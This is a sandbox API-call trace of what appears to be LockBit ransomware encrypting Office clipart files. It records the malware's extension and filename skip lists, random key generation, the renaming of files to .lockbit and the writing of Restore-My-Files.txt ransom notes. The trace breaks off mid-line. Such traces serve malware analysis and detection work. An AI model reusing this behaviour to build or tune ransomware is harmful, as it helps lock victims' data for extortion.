LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0174.841] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0174.846] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00190_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00190_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.846] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.847] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.848] free (_Block=0x1fa2ed8) [0174.848] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00190_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.848] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.848] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.848] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2090, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00191_.WMF", cAlternateFileName="")) returned 1 [0174.848] lstrcmpiW (lpString1=".", lpString2="SO00191_.WMF") returned -1 [0174.849] lstrcmpiW (lpString1="..", lpString2="SO00191_.WMF") returned -1 [0174.849] PathFindExtensionW (pszPath="SO00191_.WMF") returned=".WMF" [0174.849] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.849] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.850] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.850] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.851] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00191_.WMF") returned -1 [0174.851] lstrcmpiW (lpString1="ntldr", lpString2="SO00191_.WMF") returned -1 [0174.851] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00191_.WMF") returned -1 [0174.851] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00191_.WMF") returned -1 [0174.851] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00191_.WMF") returned -1 [0174.851] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00191_.WMF") returned 1 [0174.851] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00191_.WMF") returned -1 [0174.851] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.851] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00191_.WMF") returned=".WMF" [0174.852] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.852] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.852] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.853] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.853] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00191_.WMF.lockbit") returned 72 [0174.853] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00191_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0174.854] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.854] malloc (_Size=0x40068) returned 0x3ef0008 [0174.854] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=8336) returned 1 [0174.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0174.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0174.855] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0174.861] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00191_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00191_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.861] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.861] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.863] free (_Block=0x1fa2ed8) [0174.863] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00191_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.863] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.863] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x280c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00192_.WMF", cAlternateFileName="")) returned 1 [0174.863] lstrcmpiW (lpString1=".", lpString2="SO00192_.WMF") returned -1 [0174.863] lstrcmpiW (lpString1="..", lpString2="SO00192_.WMF") returned -1 [0174.863] PathFindExtensionW (pszPath="SO00192_.WMF") returned=".WMF" [0174.863] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.863] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.863] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.863] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.863] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.863] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.863] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.863] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.863] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.864] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.864] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.865] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00192_.WMF") returned -1 [0174.865] lstrcmpiW (lpString1="ntldr", lpString2="SO00192_.WMF") returned -1 [0174.866] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00192_.WMF") returned -1 [0174.866] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00192_.WMF") returned -1 [0174.866] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00192_.WMF") returned -1 [0174.866] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00192_.WMF") returned 1 [0174.866] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00192_.WMF") returned -1 [0174.866] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0174.866] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00192_.WMF") returned=".WMF" [0174.866] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.866] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0174.866] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0174.867] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0174.867] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00192_.WMF.lockbit") returned 72 [0174.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00192_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00192_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0174.869] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.869] malloc (_Size=0x40068) returned 0x3f70048 [0174.870] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=10252) returned 1 [0174.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0174.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0174.871] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0174.877] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00192_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00192_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.877] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.877] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.878] free (_Block=0x1fa2ed8) [0174.878] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00192_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.878] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.878] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.879] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f0d2600, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1f0d2600, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x27c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00194_.WMF", cAlternateFileName="")) returned 1 [0174.879] lstrcmpiW (lpString1=".", lpString2="SO00194_.WMF") returned -1 [0174.879] lstrcmpiW (lpString1="..", lpString2="SO00194_.WMF") returned -1 [0174.879] PathFindExtensionW (pszPath="SO00194_.WMF") returned=".WMF" [0174.879] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.879] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0174.880] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0174.880] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0174.881] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00194_.WMF") returned -1 [0174.881] lstrcmpiW (lpString1="ntldr", lpString2="SO00194_.WMF") returned -1 [0174.881] lstrcmpiW 